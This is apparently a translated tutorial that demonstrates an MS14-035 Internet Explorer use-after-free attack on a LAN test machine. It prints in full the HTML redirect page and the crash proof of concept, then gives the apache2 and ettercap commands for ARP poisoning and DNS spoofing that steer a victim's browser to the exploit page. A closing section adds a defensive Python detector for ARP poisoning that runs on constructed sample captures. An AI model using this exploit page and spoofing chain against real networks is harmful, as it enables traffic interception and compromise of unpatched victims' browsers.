• This vulnerability can crash Internet Explorer; the affected versions are IE 8, 9 and 10. Microsoft released the update patch on 10 June 2014,

so the attack now only works against IE browsers that have not been updated since 10 June 2014. For details see here:

As described above, to make use of this vulnerability we need a piece of HTML code. Below I demonstrate the attack on my own machine against a target on the LAN; the target machine

is a virtual machine running Win7 SP1 with IE9:

First, modify index.html in the /var/www directory to the following:

<html>
<head>
<meta http-equiv="refresh" content="5;url=">
<title>YOU HAVE BEEN HACKED</title>
</head>
<body>
you have been hacked,and you will shutdown!!
</body>
</html>

The idea is that when the target first opens the page, it displays “you have been hacked,and you will shutdown!!” as a show of force first; then, because the refresh interval is set to 5 seconds (http-equiv="refresh" content="5;..."), after 5 seconds the browser automatically opens the page

containing the IE vulnerability. Here that is a new file poc.html in the same directory, with the following content

(you can also modify index.html directly to this content):

<html>
<head><title>MS14-035 Internet Explorer CInput Use-after-free POC</title></head>
<body>
<form id="testfm">
<textarea id="child" value="a1" ></textarea>
<input id="child2" type="checkbox" name="option2" value="a2">Test check<Br>
<textarea id="child3" value="a2" ></textarea>
<input type="text" name="test1">
</form>
<script>
var startfl=false;
function changer() {
// Call of changer function will happen inside mshtml!CFormElement::DoReset call, after
// execution of this function crash in DoReset will happen when accessing freed CInput element
if (startfl) {
document.getElementById("testfm").innerHTML = ""; // Destroy form contents, free next CInput in DoReset
}
}
document.getElementById("child2").checked = true;
document.getElementById("child2").onpropertychange=changer;
startfl = true;
document.getElementById("testfm").reset(); // DoReset call
</script>
</body>
</html>

Then start apache2 and use ettercap for DNS spoofing:

service apache2 start

ettercap -TqP dns_spoof -M arp:remote / //

The effect looks like this:
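The ettercap command above relies on ARP poisoning (-M arp:remote) so that the victim's DNS traffic passes through the attacker's host. The following detector, added here as an example and not part of the original post, shows what that step looks like from the victim's side of the LAN: it parses tcpdump-style ARP reply lines and flags any IP (typically the gateway) that is suddenly announced by a different MAC address. The tcpdump lines and the MAC/IP values are constructed sample data.

```python
import re

# Matches tcpdump output for ARP replies, e.g.
#   12:00:00.100500 ARP, Reply 192.168.1.1 is-at aa:bb:cc:00:00:01, length 28
ARP_REPLY_RE = re.compile(
    r"^(?P<ts>\S+)\s+ARP, Reply (?P<ip>\d+\.\d+\.\d+\.\d+) is-at "
    r"(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})",
    re.IGNORECASE,
)

# Constructed sample capture: the gateway 192.168.1.1 is first announced by its
# real MAC, then a second host starts claiming the same IP (ARP poisoning).
SAMPLE_TCPDUMP = """\
12:00:00.100000 ARP, Request who-has 192.168.1.1 tell 192.168.1.20, length 28
12:00:00.100500 ARP, Reply 192.168.1.1 is-at aa:bb:cc:00:00:01, length 28
12:00:02.000000 ARP, Reply 192.168.1.20 is-at aa:bb:cc:00:00:20, length 28
12:00:03.500000 ARP, Reply 192.168.1.1 is-at de:ad:be:ef:00:99, length 28
12:00:04.000000 ARP, Reply 192.168.1.20 is-at aa:bb:cc:00:00:20, length 28
12:00:05.000000 ARP, Reply 192.168.1.1 is-at DE:AD:BE:EF:00:99, length 28
"""


def parse_arp_replies(lines):
    """Extract (timestamp, ip, mac) from ARP reply lines; other lines are skipped."""
    replies = []
    for line in lines:
        m = ARP_REPLY_RE.match(line.strip())
        if m:
            replies.append((m.group("ts"), m.group("ip"), m.group("mac").lower()))
    return replies


def detect_arp_conflicts(replies, known_bindings=None):
    """Return one alert per reply whose MAC disagrees with the binding already seen.

    known_bindings seeds trusted static IP->MAC pairs (e.g. the gateway); otherwise
    the first MAC observed for an IP is trusted. A conflicting reply never
    overwrites the trusted binding, so every poisoned reply is reported.
    """
    trusted = {ip: mac.lower() for ip, mac in (known_bindings or {}).items()}
    alerts = []
    for ts, ip, mac in replies:
        prev = trusted.get(ip)
        if prev is not None and prev != mac:
            alerts.append({"time": ts, "ip": ip, "old_mac": prev, "new_mac": mac})
        trusted.setdefault(ip, mac)
    return alerts
```

Seeding known_bindings with the gateway's real MAC lets the check catch poisoning even when the capture starts after the attack began.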